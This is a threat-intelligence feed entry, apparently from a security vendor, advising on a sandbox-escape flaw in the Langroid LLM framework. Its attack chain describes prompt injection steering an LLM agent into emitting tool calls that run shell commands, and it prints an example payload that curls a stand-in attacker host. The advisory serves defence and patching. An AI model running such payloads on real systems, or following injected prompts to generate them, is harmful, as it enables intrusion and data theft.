{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/products/langroid--0.65.1/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["Langroid (\u003c= 0.65.1)"],"_cs_severities":["critical"],"_cs_tags":["rce","sandbox-escape","llm","python","supply-chain"],"_cs_type":"advisory","_cs_vendors":["Langroid"],"content_html":"\u003cp\u003eAttackers can exploit a critical sandbox escape vulnerability, CVE-2026-54769, in the Langroid framework (versions \u0026lt;= 0.65.1) to achieve unauthenticated Remote Code Execution (RCE). This flaw specifically affects the \u003ccode\u003eTableChatAgent\u003c/code\u003e and \u003ccode\u003eVectorStore\u003c/code\u003e components when configured with \u003ccode\u003efull_eval=True\u003c/code\u003e. The vulnerability stems from an incomplete mitigation in Python's \u003ccode\u003eeval()\u003c/code\u003e function, where the \u003ccode\u003e__builtins__\u003c/code\u003e dictionary is not explicitly scrubbed from \u003ccode\u003eglobals\u003c/code\u003e, despite attempts to set \u003ccode\u003elocals\u003c/code\u003e to an empty dictionary. This oversight allows attackers to use prompt injection to force the underlying Large Language Model (LLM) to generate tool calls that include \u003ccode\u003e__import__('os').system()\u003c/code\u003e commands, which are then executed by the vulnerable \u003ccode\u003eeval()\u003c/code\u003e function in \u003ccode\u003elangroid/agent/special/table_chat_agent.py\u003c/code\u003e or \u003ccode\u003elangroid/vector_store/base.py\u003c/code\u003e. This bypass permits arbitrary system command execution, posing a significant risk for data exfiltration, unauthorized database access, or full system compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker crafts a malicious prompt containing a tool call with an \u003ccode\u003eexpression\u003c/code\u003e field set to a Python \u003ccode\u003eos.system()\u003c/code\u003e command (e.g., \u003ccode\u003e__import__('os').system('curl http://attacker.com/pwned')\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe attacker submits this crafted prompt to a Langroid application instance running a \u003ccode\u003eTableChatAgent\u003c/code\u003e or \u003ccode\u003eVectorStore\u003c/code\u003e configured with \u003ccode\u003efull_eval=True\u003c/code\u003e (e.g., Langroid version \u0026lt;= 0.65.1).\u003c/li\u003e\n\u003cli\u003eThe application's underlying Large Language Model (LLM) processes the malicious prompt and, as instructed, generates a tool message containing the attacker-controlled Python \u003ccode\u003eexpression\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe Langroid agent's \u003ccode\u003eeval()\u003c/code\u003e function (specifically within \u003ccode\u003etable_chat_agent.py\u003c/code\u003e or \u003ccode\u003ebase.py\u003c/code\u003e) attempts to execute this \u003ccode\u003eexpression\u003c/code\u003e using \u003ccode\u003eeval(code, vars, {})\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDue to an incomplete sandboxing implementation, where \u003ccode\u003e__builtins__\u003c/code\u003e are implicitly available via \u003ccode\u003eglobals\u003c/code\u003e despite an empty \u003ccode\u003elocals\u003c/code\u003e dictionary, the \u003ccode\u003e__import__('os').system()\u003c/code\u003e call within the \u003ccode\u003eexpression\u003c/code\u003e is successfully resolved and executed.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eos.system()\u003c/code\u003e function invokes a new process on the host system to execute the embedded command (e.g., \u003ccode\u003ecurl\u003c/code\u003e for C2 communication or \u003ccode\u003etouch\u003c/code\u003e for arbitrary file creation).\u003c/li\u003e\n\u003cli\u003eThis unauthenticated command execution achieves Remote Code Execution (RCE), allowing the attacker to interact with the host system's operating system environment.\u003c/li\u003e\n\u003cli\u003eThe RCE enables further actions such as unauthorized data exfiltration, privilege escalation, or full system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis vulnerability allows for a complete bypass of the application's intended security boundaries, directly enabling unauthenticated Remote Code Execution. The observed consequences include unauthorized database accesses, data exfiltration, or total system compromise, depending on the privileges of the user environment hosting the vulnerable Langroid agent process. Successful exploitation can lead to significant data breaches, loss of intellectual property, and extensive damage to the affected system and organization.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePatch Langroid to a version greater than 0.65.1 to mitigate CVE-2026-54769.\u003c/li\u003e\n\u003cli\u003eBlock traffic to \u003ccode\u003eattacker.com\u003c/code\u003e at your network perimeter using the IOC provided in this brief.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to detect suspicious process creation activities originating from Python processes.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process-creation logging (Event ID 1) on Windows or audit logging for process creation on Linux systems to ensure telemetry for the provided rules.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-07-06T20:44:54Z","date_published":"2026-07-06T20:44:54Z","id":"https://feed.craftedsignal.io/briefs/2026-07-sandbox-escape-langroid/","summary":"Langroid is vulnerable to a critical Remote Code Execution (RCE) in its `TableChatAgent` and `VectorStore` components when `full_eval=True` due to CVE-2026-54769; the `eval()` function fails to properly scrub `__builtins__` from `globals`, allowing attackers to inject `__import__('os').system()` calls via crafted prompt payloads, leading to unauthenticated RCE, unauthorized data access, or system compromise on the host running the Langroid agent.","title":"Langroid Sandbox Escape via Incomplete eval() Mitigation","url":"https://feed.craftedsignal.io/briefs/2026-07-sandbox-escape-langroid/"}],"language":"en","title":"CraftedSignal Threat Feed - Langroid (\u003c= 0.65.1)","version":"https://jsonfeed.org/version/1.1"}